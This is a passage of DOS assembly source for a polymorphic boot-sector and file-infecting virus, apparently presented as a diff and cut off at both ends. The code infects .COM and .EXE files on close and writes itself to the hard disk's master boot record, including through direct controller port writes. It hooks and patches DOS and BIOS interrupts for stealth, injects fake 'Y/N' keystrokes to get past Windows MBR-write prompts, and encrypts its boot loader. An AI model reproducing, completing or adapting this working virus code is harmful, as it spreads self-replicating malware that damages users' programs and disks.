POP DX + + PUSH DX + PUSH CX + + AND DX, 1FFh + + CMP File_Mod512, DX + JE LOC_168 + + ADD SP, 04h + STC + RETN +LOC_168: + XOR CX, CX ; Go to start of file. + MOV DX, CX + MOV AX, 4200h + CALL Traced_i21h + + MOV DX, OFFSET Buffer ; Read header. + MOV CX, 28 + MOV AH, 40h + CALL Traced_i21h + + POP CX ; Go to start of file. + POP DX + MOV AX, 4200h + CALL Traced_i21h + + MOV AH, 40h ; Write marker. + XOR CX, CX + CALL Traced_i21h + + RETN + + + +Set_Dummy_Handlers: + PUSH ES + + XOR AX, AX + MOV ES, AX + + MOV AX, ES:[24h * 4] ; Save INT 24h. + MOV CS:Int24h, AX ; (Critical error-handler). + MOV AX, ES:[24h * 4 + 2] + MOV CS:Int24h+2, AX + + MOV AX, ES:[1Bh * 4] ; Save INT 1Bh. + MOV CS:DATA_122, AX ; (Ctrl-Break handler). + MOV AX, ES:[1Bh * 4 + 2] + MOV CS:DATA_123, AX + + MOV ES:[24h * 4 + 2], CS ; Dummy error-handler. + MOV ES:[24h * 4], OFFSET NewInt24h + + MOV ES:[1Bh * 4 + 2], CS ; Dummy Ctrl-Break handler. + MOV ES:[1Bh * 4], OFFSET Do_IRET + + POP ES + + RETN + + +Restore_Dummy_Handlers: + + PUSH DS + PUSH ES + PUSH SI + + XOR AX, AX + CLD + + PUSH CS + POP DS + + MOV ES, AX + + MOV SI, OFFSET Int24h ; Restore original INT 24h. + MOV DI, 24h * 4 + MOVSW + MOVSW + + MOV DI, 1Bh * 4 ; Restore original INT 1Bh. + MOVSW + MOVSW + + POP SI + POP ES + POP DS + + RETN + + +Make_Random_Stack: + + CALL Get_Random_Poly + + AND AX, 00000011b ; Mask between 0 - 3. + JZ Make_Random_Stack + + ADD AX, Init_CS ; Variable stacksegment. + MOV Init_SS, AX + + CALL Get_Random_Poly + AND AX, 00000111b ; 0 - 7. + ADD AX, (Virus_Size + 272) + + AND AL, 11111110b + MOV Init_SP, AX + + RETN + + +Infect_Close: + PUSH BX + PUSH CX + PUSH DX + PUSH ES + PUSH DS + PUSH DI + PUSH SI + PUSHF + + PUSH AX + CALL Set_Dummy_Handlers + + TEST CS:Flags, 00000001b + JNZ LOC_172 + + CALL Save_FileTime + MOV AX, CS:Trace_Int + AND AL, 00011111b ; Mask seconds. + + CMP AL, 00010001b ; Infected stamp? + JE LOC_172 + + CALL Get_FileName + JC LOC_172 + + XOR CX, CX ; Go to begin file. + MOV DX, CX + MOV AX, 4200h + CALL Traced_i21h + JC LOC_172 + + MOV AH, 3Fh ; Read header. + MOV CX, 28 + + PUSH CS + POP DS + + PUSH DS + POP ES + + MOV DX, OFFSET Buffer + CALL Traced_i21h + JC LOC_172 + + CMP AX, CX ; Bytes read not equal? + JNE LOC_172 + + MOV SI, DX + CLD + LODSW ; String [si] to ax + + CMP AX, 'ZM' ; True .EXE-file? + JE LOC_170 + + CMP AX, 'MZ' ; True .EXE-file? + JE LOC_170 + + CALL Infect_COM + JC LOC_172 + + JMP LOC_171 +LOC_170: + CALL Infect_EXE + JC LOC_172 +LOC_171: + MOV AX, Trace_Int + AND AL, 0E0h + OR AL, 11h + MOV Trace_Int, AX + CALL Restore_FileTime +LOC_172: + POP AX + POPF + MOV AH, 3Eh ; Close file. + CALL Traced_i21h + + PUSH AX + PUSHF + CALL Restore_Dummy_Handlers + + POPF + POP AX + POP SI + POP DI + POP DS + POP ES + POP DX + POP CX + POP BX + RETN + + + +Get_FileName: + PUSH BX + + MOV AX, 1220h ; Get DCB-number. + INT 2Fh + JNC LOC_174 + +Error_DCB: STC + JMP LOC_183 + NOP +LOC_174: + CMP BYTE PTR ES:[DI], 0FFh ; Filehandle not open? + JE Error_DCB + + XOR BX, BX + MOV BL, ES:[DI] + + MOV AX, 1216h ; Get DCB-address. + INT 2Fh + JC LOC_183 + + PUSH ES + POP DS + + PUSH CS + POP ES + +;* AND [DI+2],0FFF8H + DB 83H, 65H, 02H,0F8H ; Fixup - byte match + OR WORD PTR [DI+2], 02h ; Set file open-mode to r/w. + ADD DI, 20h + MOV SI, DI + CLD + PUSH SI + MOV DI, OFFSET FileName2 + XOR BX, BX + MOV CX, 08h + +LOCLOOP_175: + LODSB ; String [si] to al + + CMP AL, ' ' + JE LOC_176 + + STOSB + INC BX + LOOP LOCLOOP_175 + +LOC_176: + MOV AL, '.' + STOSB + INC BX + POP SI + ADD SI, 08h + MOV CX, 03h + +LOCLOOP_177: + LODSB ; String [si] to al + CMP AL, ' ' + JE LOC_178 + + STOSB + INC BX + INC BH + LOOP LOCLOOP_177 + +LOC_178: + CMP BH, 03h + JE LOC_180 +LOC_179: + STC + JMP LOC_183 +LOC_180: + SUB SI,3 + LODSW ; String [si] to ax + + CMP AX, 'XE' ; .EXE-file? + JE LOC_181 + + CMP AX, 'OC' ; .COM-file? + JNE LOC_179 +LOC_181: + LODSB ; String [si] to al + + CMP AX, 'XE' ; .EXE-file? + JE LOC_182 + + CMP AX, 'OM' ; .COM-file? + JNE LOC_179 +LOC_182: + MOV BH, 00h + CALL SUB_14 +LOC_183: + POP BX + + RETN + +Check_Infect: + TEST Flags, 00000100b + JZ No_JMP_Start + + CMP Host_Type, 00h ; Host is .COM-file? + JE Handle_COM1 + + MOV AX, [SI+0Eh] ; SS. + SUB AX, [SI+16h] ; Minus CS. + JZ No_JMP_Start + + SUB AX, 03h + JA No_JMP_Start + + MOV AX, [SI+14h] ; AX = IP. + + CMP AX, OFFSET Buffer + JB No_JMP_Start + + CMP AX, 1EC4h + JA No_JMP_Start + + STC + + RETN +Handle_COM1: + CMP BYTE PTR [SI], 0E9h ; Starts with a JMP ? + JNE No_JMP_Start + + STC + + RETN +No_JMP_Start: + CLC + + RETN + + + +Infect_Harddisk: + + MOV AX, 5445h ; Residency-check. + INT 13h + + CMP AX, 4554h ; Are we already resident? + JE JMP_Exit_HD_Infect ; (harddisk already infected) + + PUSH CS + POP ES + + XOR AX, AX + MOV DS, AX + + MOV SI, 13h * 4 ; Save INT 13h. + MOV DI, OFFSET Traced_Int13h + + CLD + MOVSW + MOVSW + + PUSH CS + POP DS + + MOV DX, 80h ; Read MBR of 1st harddisk. + MOV CX, 01h + MOV AX, 0201h + MOV BX, OFFSET Buffer + CALL Traced_i13h + JNC No_Err_1 + +JMP_Exit_HD_Infect: + + JMP LOC_RET_189 + NOP +No_Err_1: + MOV AX, Drew2 + SUB AX, Drew1 + + CMP AX, 0CCFFh ; Already infected? + JE JMP_Exit_HD_Infect + + MOV AH, 08h ; Get disk drive parameters. + MOV DL, 80h + CALL Traced_i13h + + MOV AX, 0310h ; Store virusbody on HD. + XOR BX, BX + INC CH + MOV DATA_150, CX + DEC DH + SUB CL, 16 ; - Virus_Size + MOV DL, 80h + CALL Traced_i13h + JC JMP_Exit_HD_Infect + + ADD CL, 16 ; Store original MBR. + MOV BX, OFFSET Buffer + MOV AX, 0301h + CALL Encrypt_Boot + CALL Traced_i13h + JC JMP_Exit_HD_Infect + + CLD + MOV BL, 01h + CALL SUB_49 + MOV DX, 80h + MOV CX, 01h + MOV AX, 0301h + MOV BX, OFFSET Buffer + + TEST Flags, 10000000b ; Win95/NT active? + JZ LOC_188 + + PUSH AX ; PARAMETER_4 + PUSH BX ; PARAMETER_3 + PUSH CX ; PARAMETER_2 + PUSH DX ; PARAMETER_1 + CALL Infect_Exec2 + JNC LOC_RET_189 ; Jump if carry=0 +LOC_188: + CALL Infect_Exec3 + +LOC_RET_189: + RETN + + CLI + XOR AX, AX + MOV SS, AX ; Setup stack. + MOV SP, 7C00h + MOV DS, AX +Init_Boot_Key: MOV CH, 0 + ORG $-1 +Boot_Key DB 0B8h +Boot_Ptr: MOV SI, 0 + ORG $-2 +Start_Encr DW 7C16h +Screw1: + +LOC_190: + SUB [SI], CH +Change_Ptr: INC SI +Change_Key: INC CH +Boot_Loop: JL LOC_190 ; Jump if < +Encr_Boot: + + STI + + INT 12h + SUB AX, 9 ; Reserve our memory. + + MOV CL, 6 ; Convert to segment-address. + SHL AX, CL + + MOV ES, AX + + MOV AH, 08h ; Get disk drive parameters. + MOV DL, 80h + INT 13h + + INC CH + DEC DH + SUB CL, 10h + MOV DL, 80h + MOV AX, 0211h ; Read virusbody from disk. + XOR BX, BX + INT 13h + + PUSH ES + MOV AX, OFFSET Reloc_Boot + PUSH AX + RETF + + +Traced_Int13h DW 0, 0 + +Reloc_Boot: + PUSH DS ; ES = 0. + POP ES + + PUSH CS + POP DS + + MOV DI, 7C00h + + PUSH ES + PUSH DI + + MOV SI, 2000h + + CLD + MOV CX, 512 + REP MOVSB + + CALL Botty + STI + RETF + +SUB_49: + MOV Poly_Sector, 00h + PUSH BX + CLD + CALL Get_Ran_3 + + MOV AH, Mov_Ptr[BX] + MOV BYTE PTR Boot_Ptr, AH + MOV AH, Inc_Ptr[BX] + MOV BYTE PTR Change_Ptr, AH + MOV DL, BL + ADD BL, 03h + + CMP BL, 03h + JNE LOC_191 + + SUB BL,2 +LOC_191: + MOV DATA_94,BL +LOC_192: + CALL Get_Random_Poly + NOT AX + AND AL, 07h + MOV BL, AL + SHR AL, 01h + + CMP DATA_94, AL + JE LOC_192 + + MOV DATA_95, BL + MOV AH, DATA_110[BX] + MOV BYTE PTR Init_Boot_Key, AH + MOV AH, DATA_115[BX] + MOV BYTE PTR Change_Key+1, AH + SHL DL, 03h + ADD BL, DL + MOV AH, DATA_111[BX] + MOV byte ptr Screw1+1, AH + CALL Get_Random_Poly + MOV BL, AH + AND BX, 03h + + MOV AH, DATA_117[BX] + MOV BYTE PTR Boot_Loop, AH + CALL Get_Ran_3 + MOV AL, Encr_Methods[BX] + MOV AH, 0E0h + MOV WORD PTR Bozo, AX + XOR BL, 03h + MOV AL, Encr_Methods[BX] + MOV byte ptr Screw1, AL + +LOC_193: + CALL Get_Random_Poly + OR AH, 10000000b + + CMP AH, 0D8h + JAE LOC_193 + + POP BX + PUSH BX + PUSH AX + MOV BH, 00h + MOV Boot_Key, AH + MOV SI, 1409h + MOV DI, OFFSET Buffer + MOV Start_Encr, 7C16h + + CMP BL, 02h + JNE LOC_194 + + MOV DI,1EA8h + MOV Start_Encr, 7C54h +LOC_194: + CALL Get_Random_Poly + AND AX, 03h + XCHG BX, AX + MOV AL, DATA_119[BX] + MOV [SI+2], AL + MOV AL, 0D0h + ADD AL, BL + MOV [SI+4], AL + + MOVSW + MOVSW + MOVSW + MOVSW + + MOV DH, BL + XOR CX, CX + CALL SUB_50 + CALL Get_Random_Poly + OR AX, AX + JP LOC_195 ; Jump if parity=1 + MOV AX,[SI] + ADD SI, 02h + OR Flags, 00001000b + MOVSW + MOVSB + STOSW + JMP LOC_196 +LOC_195: + MOVSW + MOVSW + MOVSB +LOC_196: + CALL SUB_51 + MOVSW ; Mov [si] to es:[di] + MOV DATA_93, 0FFh + CALL SUB_27 + CALL SUB_52 + LODSW ; String [si] to ax + SUB AH, CL + STOSW + SUB CL, CH + MOV AL, CH + + TEST Flags, 00001000b + JZ LOC_197 + + ADD AL, 02h +LOC_197: + AND Flags, 0F7h + CBW ; Convrt byte to word + MOV SI, 1E77h + SUB SI, AX + MOV AX, CX + POP CX + POP BX + PUSH CX + + CMP BL, 02h + JNE LOC_198 + + ADD SI, 3Eh +LOC_198: + CBW ; Convrt byte to word + ADD [SI],AX + POP AX + MOV CX,1FH + MOV SI,1DEFH + + CMP BL, 02h + JE LOCLOOP_199 + + CMP BL, 01h + JNE LOC_RET_200 + + MOV CX, 28h + MOV SI, 141Fh + +LOCLOOP_199: + LODSB ; String [si] to al + +Bozo: +;* ADD AL,AH + DB 00H,0E0H ; Fixup - byte match + INC AH + STOSB ; Store al to es:[di] + LOOP LOCLOOP_199 + + CALL Get_Random_Poly + NOT AX + MOV Drew1, AX + ADD AX, 0CCFFh + MOV Drew2, AX + +LOC_RET_200: + RETN + + +SUB_50: + ADD SI, 02h + CALL Get_Random_Poly + NOT AX + AND AL, 03h + MOV BL, AL + MOV DL, [BX+Overrides] + + CMP AL, 01h + JE LOC_203 + + CMP AL, 03h + JE LOC_203 + + SHR BL, 01h + MOV AL, 06h + MUL BL ; ax = reg * al + MOV BX, AX +LOC_201: + CALL Get_Random_Poly + AND AH, 03h ; 0 - 3. + + CMP AH, 03h ; 0, 1, 2 + JE LOC_201 + + SHL AH, 1 ; MUL 2. + ADD BL, AH + MOV AX, DATA_118[BX] + + CMP AL, 16h + JE LOC_203 + + CMP AL, 50h + JNE LOC_202 + + ADD AL, DH + STOSW + + RETN + +LOC_202: + ADD AH, DH + STOSW + + RETN +LOC_203: + MOV CH, 02h + + RETN + + + +SUB_51: + CMP DL, 3Eh + JE LOC_RET_204 + + MOV AL, DL + STOSB + + ADD CL, 01h + +LOC_RET_204: + RETN + + +SUB_52: + CALL Get_Random_Poly + NOT AX + ADD AL,AH + + CMP AL, 85 + JB LOC_206 + + ADD SI, 02h + ADD CL, 01h + MOV BL, DATA_95 + + CMP AL, 0AAh + JB LOC_205 + + MOV AL, 80h + MOV AH, DATA_115[BX] + STOSW + + MOV AL, 01h + STOSB + + RETN +LOC_205: + MOV AL, 80h + MOV AH, DATA_116[BX] + STOSW + + MOV AL, 0FFh + STOSB + + RETN +LOC_206: + MOVSW ; Mov [si] to es:[di] + RETN + + + +Encrypt_Boot: + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH DI + PUSH SI + + CLD + MOV DX, BX + MOV DI, DX + MOV AX, 'ef' + MOV BX, 7463h + MOV CX, 200h ; 1024 bytes. + +LOCLOOP_207: + SCASW ; Scan es:[di] for ax + JNZ LOC_208 + + XCHG BX, AX + + SCASW ; Scan es:[di] for ax + JZ LOC_209 + + XCHG BX, AX + SUB DI, 02h +LOC_208: + DEC DI + LOOP LOCLOOP_207 + + JMP LOC_215 +LOC_209: + MOV AX, 4Eh +LOC_210: + MOV CX, 200h + MOV DI, DX + MOV SI, 0Ch + +LOCLOOP_211: + SCASW ; Scan es:[di] for ax + JNZ LOC_212 + + ADD ES:[DI-2], SI +LOC_212: + DEC DI + LOOP LOCLOOP_211 + + DEC AX + DEC AX + + CMP AX, 4Ch + JE LOC_210 + + MOV DI, DX + MOV CX, 1C0h + MOV AX, 280h + +LOCLOOP_213: + SCASW ; Scan es:[di] for ax + JC LOC_214 + + DEC DI + DEC DI + PUSH AX + DEC AX + DEC AX + SCASW ; Scan es:[di] for ax + POP AX + JA LOC_214 + + SUB ES:[DI-2],SI +LOC_214: + DEC DI + LOOP LOCLOOP_213 + +LOC_215: + POP SI + POP DI + POP DX + POP CX + POP BX + POP AX + POPF + + RETN + + + +SUB_54: + MOV AX, 0201h ; Read MBR of 1st harddisk. + MOV BX, OFFSET Buffer + + XOR CX, CX + MOV DS, CX + + PUSH CS + POP ES + + INC CX ; MBR. + MOV DX, 80h + INT 13h + + MOV DI, OFFSET Drew3 + MOV SI, DATA_25E + MOV CL, 40h + REP MOVSB + + INC CX + + PUSH CS + POP DS + + MOV AX, 0301h + MOV DATA_138, CH + CALL Infect_Exec3 + + RETN + +DATA_138 DB 0 + +SUB_55: + PUSH AX + PUSH BX + PUSH DX + + MOV AX, 0201h ; Read MBR of 1st harddisk. + MOV BX, OFFSET Buffer + PUSH CS + POP ES + MOV CX, 01h + MOV DX, 80h + CALL Traced_i13h + + MOV DI, OFFSET Drew3 + MOV CL, 40h + REP STOSB + + INC CX + MOV AX, 0301h + CALL Infect_Exec3 + + POP DX + POP BX + POP AX + + RETN + +Botty: + + CALL SUB_54 + CALL SUB_4 + + XOR AX, AX + MOV DS, AX + + MOV SI, 1Ch * 4 + MOV DI, OFFSET Int1Ch + + MOVSW + MOVSW + + MOV SI, 21h * 4 + MOV DI, OFFSET Int13h + + MOVSW + MOVSW + + INT 12h ; Save total DOS-memory. + MOV CS:Dos_Mem, AX ; Save it. + + SUB WORD PTR DS:[413h], 9 ; Subtract our needs. + NOP + + MOV BYTE PTR CS:DATA_77, 02h + + CLI ; Hook INT 1Ch (timer). + MOV DS:[1Ch * 4 + 2], CS + MOV DS:[1Ch * 4], OFFSET NewInt1Ch + STI + + CALL Check_Poly_Sector + + RETN + +NewInt1Ch: + PUSH AX + PUSH DS + PUSH ES + PUSH SI + PUSH DI + + XOR AX, AX + MOV DS, AX + + MOV SI, 21h * 4 + + PUSH CS + POP ES + + MOV DI, OFFSET Int13h + CLD + + CMPSW ; Cmp [si] to es:[di] + JZ LOC_216 + + MOV AL, 01h +LOC_216: + CMPSW ; Cmp [si] to es:[di] + JZ LOC_217 + + MOV AH, 01h +LOC_217: + OR AX, AX + JZ LOC_218 + + SUB SI,4 + SUB DI,4 + MOVSW + MOVSW + + DEC BYTE PTR ES:DATA_77 + JNZ LOC_218 + + MOV DI, OFFSET Traced_Int13h + MOV SI, 13h * 4 + + MOVSW + MOVSW + + MOV DI, OFFSET Int13h + MOV SI, 13h * 4 + + MOVSW + MOVSW + + MOV DI, OFFSET Traced_Int21h + MOV SI, 21h * 4 + + MOVSW + MOVSW + + MOV DS:[1Ch * 4], OFFSET Int1Ch_Di +LOC_218: + POP DI + POP SI + POP ES + POP DS + POP AX + +Exit_Int1Ch: JMP DWORD PTR CS:Int1Ch + + +Int1Ch_Di: + PUSH AX + PUSH DS + PUSH DI + + XOR AX, AX + MOV DS, AX + + MOV DS, DS:[22h * 4 + 2] ; Get 1st instruction of + MOV AX, DS:[0] ; INT 22h(terminate address). + + CMP AX, 20CDh ; INT 20h? + JNE LOC_220 + + XOR AX, AX + MOV DS, AX + + MOV AX, CS:Dos_Mem ; Put back old value. + MOV DS:[413h], AX + + MOV AX, CS:Int1Ch ; Restore original INT 1Ch. + MOV DS:[1Ch * 4], AX + MOV AX, CS:Int1Ch+2 + MOV DS:[1Ch * 4 + 2], AX + + MOV AX, DS:[21h * 4] ; Save INT 21h. + MOV CS:Int21h,AX + MOV AX, DS:[21h * 4 + 2] + MOV CS:Int21h+2,AX + + MOV AX, DS:[28h * 4] ; Save INT 28h. + MOV CS:Int28h, AX + MOV AX, DS:[28h * 4 + 2] + MOV CS:Int28h+2, AX + + MOV DS:[28h * 4], OFFSET NewInt28h ; Hook INT 28h. + MOV DS:[28h * 4 + 2], CS + + MOV DS:[21h * 4], OFFSET NewInt21h ; Hook INT 21h. + MOV DS:[21h * 4 + 2], CS + + PUSH SI + PUSH ES + + CALL Slice_Int13h + CALL Insert_Slice + + POP ES + POP SI +LOC_220: + POP DI + POP DS + POP AX + + JMP Exit_Int1Ch + +NewInt28h: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH ES + PUSH DS + PUSH DI + PUSH SI + + TEST CS:DATA_138, 10000000b + JNZ LOC_221 + + OR CS:DATA_138, 10000000b + CLD + + PUSH CS + POP DS + + CALL Unslice_Int13h + CALL Infect_Harddisk + CALL SUB_55 + CALL Insert_Slice +LOC_221: + CALL SUB_56 + CALL SUB_57 + + POP SI + POP DI + POP DS + POP ES + POP DX + POP CX + POP BX + POP AX + + DB 0EAh ; JMP FAR opcode. +Int28h DW 0, 0 + + + +SUB_56: + + MOV AX,160Ah ; Identify Windows version + INT 2Fh ; and type. + + OR AX, AX ; Valid function? + JNZ LOC_223 + + CMP BH, 04h ; Windows 95/NT ? + JB LOC_223 ; Else abort function. + + OR CS:Flags, 00000100b + + MOV AX, 5445h ; INT 13h residency-check. + INT 13h + + CMP AX, 4554h ; Have we hooked INT 13h? + JE LOC_RET_222 + + OR CS:DATA_138, 00000010b + + MOV AX, 3513h ; Get address INT 13h. + INT 21h + + MOV CS:Traced_Int13h, BX ; Save address INT 13h. + MOV CS:Traced_Int13h+2, ES + + XOR AX, AX + MOV DS, AX + + MOV DS:[13h * 4], OFFSET NewInt13h + MOV DS:[13h * 4 + 2], CS + +LOC_RET_222: + RETN +LOC_223: + AND CS:Flags, 11111011b + AND CS:DATA_138, 11111100b + + RETN + + + +SUB_57: + TEST CS:Flags, 00000100b + JNZ LOC_RET_224 + + MOV AX, 5445h ; INT 13h hooked already? + INT 13h + + CMP AX, 4554H + JE LOC_RET_224 + + MOV AX, CS:Int13h + MOV CS:Traced_Int13h, AX + MOV AX, CS:Int13h+2 + MOV CS:Traced_Int13h+2, AX + AND CS:DATA_138, 0FCh + + CALL Slice_Int13h + CALL Insert_Slice + +LOC_RET_224: + RETN + + + +Traced_i13h: + PUSHF + CALL DWORD PTR CS:Traced_Int13h + + RETN + + +NewInt16h: + CMP AH, 01h ; Read keyboard-status? + JA JMP_Int16h + + CMP AH, 01h ; Read keyboard-status? + JE LOC_225 + + CALL Infect_Exec1 + CALL OldInt16h ; Execute function. + CALL Get_Proceed_Char + + MOV BYTE PTR CS:Dum2, 02h + + RETF 2 ; Return to caller. + +LOC_225: + DEC BYTE PTR CS:[18EDH] + JNZ JMP_Int16h + + MOV BYTE PTR CS:[18EDH], 5 + + PUSH AX + PUSH CX + + CALL Get_Proceed_Char + MOV CX, AX + MOV AH, 05h + INT 16h ; Keyboard i/o ah=function 05h + ; stuff key cx into keybd buffr + POP CX + POP AX + CALL OldInt16h + RETF 2 ; Return far + +JMP_Int16h: + DB 0EAh ; JMP to original handler. +Int16h DW 0, 0 + +Dum3 DB 04h +Dum1 DW 0 +Dum2 DB 02h + +OldInt16h: + PUSHF + CALL DWORD PTR CS:Int16h + + RETN + + +;fuck +Proceed_Key DW 1559h ; Y + DW 314Eh ; N + DW 314Eh ; N + DW 314Eh ; N + DW 1559h ; Y + DW 1559h ; Y + DW 314Eh ; N + DW 1559h ; Y + + +Get_Proceed_Char: + + PUSH DI + + MOV DI, CS:Dum1 + MOV AL, CS:Dum2 + CBW + ADD DI, AX + MOV AX, CS:Proceed_Key[DI] + + POP DI + + RETN + + + +Infect_Exec1: + PUSH AX + PUSH CX + + MOV AH, 01h ; Read keyboard-status. + CALL OldInt16h + JZ LOC_227 + + XCHG CX, AX + CALL Get_Proceed_Char + + CMP AX, CX + JE LOC_228 + + PUSH DS + + XOR AX, AX + MOV DS, AX + + MOV AX, DS:[41Ah] ; Address BASIC errorhandler. + MOV DS:[41Ch], AX ; Mink (?). + + POP DS +LOC_227: + CALL Get_Proceed_Char + MOV CX, AX ; Write to keyboard-buffer. + MOV AH, 05h + INT 16h + +LOC_228: + POP CX + POP AX + + RETN + + + +Infect_Exec2: + +PARAMETER_1 = 4 ; BP+4 +PARAMETER_2 = 6 ; BP+6 +PARAMETER_3 = 8 ; BP+8 +PARAMETER_4 = 0AH ; BP+0AH + + PUSH BP + MOV BP, SP + + MOV Trace_Function, 0 ; Function: Reset disk. + MOV First_MCB, 71h + MOV Fake_PUSHF, 00h + MOV Trace_Done, 01h + + MOV AX, 3513h ; Get INT 13h. + INT 21h + + MOV Trace_Int, BX + MOV Trace_Int+2, ES + CALL Tracer + + CLD ; Replace INT 13h address + MOV SI, OFFSET Trace_Int ; with traced address. + MOV DI, OFFSET Traced_Int13h + MOVSW + MOVSW + + MOV AX, 440Dh + MOV BX, 180h + MOV CX, 84Bh + INT 21h ; DOS Services ah=function 44h + ; IOctl-D block device control + ; bl=drive, cx=category/type + ; ds:dx ptr to parameter block + + MOV AX, 3516h ; Get INT 16h. + INT 21h + + MOV Int16h, BX ; Save address INT 16h. + MOV Int16h+2, ES + + MOV Dum3, 05h + MOV Dum1, 0 + MOV DX, OFFSET NewInt16h + MOV AX, 2516h ; Hook INT 16h (keyboard). + INT 21h + + PUSH CS + POP ES + + MOV BX, [BP+PARAMETER_3] + MOV CX, [BP+PARAMETER_2] + MOV DX, [BP+PARAMETER_1] +LOC_229: + MOV AX, [BP+PARAMETER_4] + CALL Traced_i13h + JNC LOC_230 + + MOV AX, Dum1 + ADD AL, 04h + MOV Dum1, AX + MOV Dum2, 00h + + CMP AL, 0Ch + JBE LOC_229 + + STC +LOC_230: + PUSHF + PUSH DS + LDS DX, DWORD PTR Int16h + MOV AX, 2516h ; Restore original INT 16h. + INT 21h + + POP DS + POPF + POP BP + + RETN 8 + + +Infect_Exec3: + CALL Infect_Exec6 + JC LOC_232 + + JMP LOC_233 +LOC_231: + POP ES + POP DX + POP CX + POP BX + POP AX +LOC_232: + CALL Traced_i13h + JMP LOC_RET_236 + + +LOC_233: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH ES + + MOV DI, 04h +LOC_234: + MOV SI, BX + + DEC DI + JZ LOC_231 + + MOV AH, 00h ; Reset 1st harddisk. + MOV DL, 80h + INT 13h + + XOR AX, AX + MOV ES, AX + + MOV ES:48Eh, AL + + CLD + MOV DX, 3F6h + MOV AL, 04h + OUT DX, AL ; Reset controller. + + JMP $+2 ; Delay for I/O. + JMP $+2 + + MOV AL, 0 + OUT DX, AL ; al = 0, hdsk0 register + CALL Wait_Ready + + MOV DX, 1F2h ; Sector count. + MOV AL, 01h ; 1 sector. + OUT DX, AL + + JMP $+2 + JMP $+2 + + INC DX + MOV AL, 01h ; Sector: MBR. + OUT DX, AL + + JMP $+2 + JMP $+2 + + INC DX + MOV AL, 0 + OUT DX, AL ; Cylinder lo. + + JMP $+2 + JMP $+2 + + INC DX + MOV AL, 0 + OUT DX, AL ; Cylinder hi. + + JMP $+2 + JMP $+2 + + INC DX + MOV AL, 10100000b + OUT DX, AL ; 1st harddisk, head zero. + + JMP $+2 ; Delay for I/O. + JMP $+2 + + INC DX + MOV AL, 31h + OUT DX, AL ; Write sectors without retry. + CALL Wait_Servicing + + MOV CX, 256 + MOV DX, 1F0h ; Data-register. + DB 0F3h, 6Fh ; REP OUTSW, (286+). +LOC_235: + MOV AL, ES:48Eh + + OR AL, AL + JZ LOC_235 + + CALL Wait_Ready + + TEST AL, 00100001b ; Write fault? + JNZ LOC_234 + + POP ES + POP DX + POP CX + POP BX + POP AX + +LOC_RET_236: + RETN + + + +Wait_Ready: + + MOV DX, 1F7h +Not_Ready: + IN AL, DX ; Get status-register. + + TEST AL, 10000000b ; Controller executing + JNZ Not_Ready ; command? + + RETN + + + +Wait_Servicing: + CALL Wait_Ready + + TEST AL, 00001000b ; Disk buffer requires + JZ Wait_Servicing ; servicing? + + RETN + + +; Sets CF +Infect_Exec6: + PUSH AX + PUSH BX + + MOV AX, SP + + PUSH SP + POP BX + + STC + PUSHF + + CMP AX, BX + JNE LOC_239 + + MOV AL, 12h + CALL Infect_Exec7 + + POPF + CLC + PUSHF + + AND AH, 11110000b + + CMP AH, 00010000b + JA LOC_239 + + POPF + STC + PUSHF +LOC_239: + POPF + POP BX + POP AX + + RETN + +Infect_Exec7: + PUSH BX + + MOV BL, AL + OR AL, 80h + CLI + OUT 70h, AL ; Port 70h, CMOS addr,bit7=NMI + ; AL = 92h, hard disk type. + JMP $+2 ; Delay for I/O. + JMP $+2 + + IN AL, 71h ; Port 71H, CMOS data. + MOV AH, AL + XOR AL, AL + + JMP $+2 + JMP $+2 + + OUT 70h, AL ; Port 70h, CMOS addr,bit7=NMI + ; AL = 0, seconds register + STI + MOV AL, BL + POP BX + + RETN + +Entry_Bytes DB 5 DUP(0) ; Original first 5 bytes of INT 13h + ; entrypoint which are overwritten + ; with a JMP FAR to our handler. +; +; Copies the first five bytes of INT 13h to a temp variable. +; +Slice_Int13h: + PUSH CS + POP ES + + MOV DI, OFFSET Entry_Bytes + LDS SI, DWORD PTR ES:Traced_Int13h + + CLD + MOVSW + MOVSW + MOVSB + + RETN + + +; +; Overwrites the entrypoint of INT 13h with a JMP FAR to our INT 13h handler. +; +; +Insert_Slice: + PUSH DS + PUSH SI + PUSH AX + PUSHF + + TEST CS:DATA_138, 00000010b ; Init INT 13h ? + JNZ LOC_240 + + LDS SI, DWORD PTR CS:Traced_Int13h + + ; Overwrite with JMP FAR [viruscode]. + + MOV BYTE PTR [SI], 0EAh + MOV WORD PTR [SI+1], OFFSET NewInt13h + MOV WORD PTR [SI+3], CS +LOC_240: + POPF + POP AX + POP SI + POP DS + + RETN + + +Unslice_Int13h: + + PUSHF + PUSH CX + PUSH DI + PUSH SI + PUSH DS + PUSH ES + + PUSH CS + POP DS + + TEST DATA_138, 00000010b ; INT 13h hooked already? + JNZ LOC_241 + + CLI + MOV SI, OFFSET Entry_Bytes + LES DI, DWORD PTR Traced_Int13h + + CLD ; Copy + MOV CX, 5 + REP MOVSB +LOC_241: + STI + POP ES + POP DS + POP SI + POP DI + POP CX + POPF + + RETN + +Int13h DW 0, 0 +DATA_150 DW 0BDBFh +Dos_Mem DW 0 +DATA_152 DB 0 +Function_i13h DB 0 +DATA_154 DB 0 + DB 0 + +Exec_Int13h: + POPF + + MOV CS:Function_i13h, AH ; Save function #. + CALL Traced_i13h + + PUSHF + + OR AH, AH + JZ LOC_243 + + JMP LOC_255 +LOC_243: + MOV CS:Function_i13h,0 + POPF + CALL Insert_Slice + RETF 2 + +NewInt13h: + PUSHF + + CMP AX, 5445h ; Residency-check? + JNE Check_Next_2 + + MOV AX, 4554h ; Our sign. + POPF + + RETF 2 ; Return to caller. + +Check_Next_2: + CALL Unslice_Int13h + + CMP DX, 80h ; Head zero of 1st harddisk? + JNE LOC_245 + + CMP CX, 01h ; MBR? + JNE LOC_245 + + CMP AH, 03h ; Doing a write? + JA LOC_245 + + CMP AH, 02h ; Doing a read? + JB LOC_245 + + POPF + + JMP LOC_249 + NOP +LOC_245: + CMP DL, 80h + JNB LOC_247 + + CMP AH, 16h + JNE LOC_246 + + JMP Exec_Int13h +LOC_246: + CMP AH, 05h + JAE LOC_247 + + CMP AH, 01h + JBE LOC_247 + + JMP LOC_255 +LOC_247: + CMP DL, 80h + JNE LOC_248 + + CMP CS:DATA_150, CX + JNE LOC_248 + + AND CH, 02h +LOC_248: + POPF + + CALL Traced_i13h + CALL Insert_Slice + + RETF 2 +LOC_249: + PUSH BX + PUSH CX + PUSH DX + PUSH ES + + CMP AH, 02h + JE 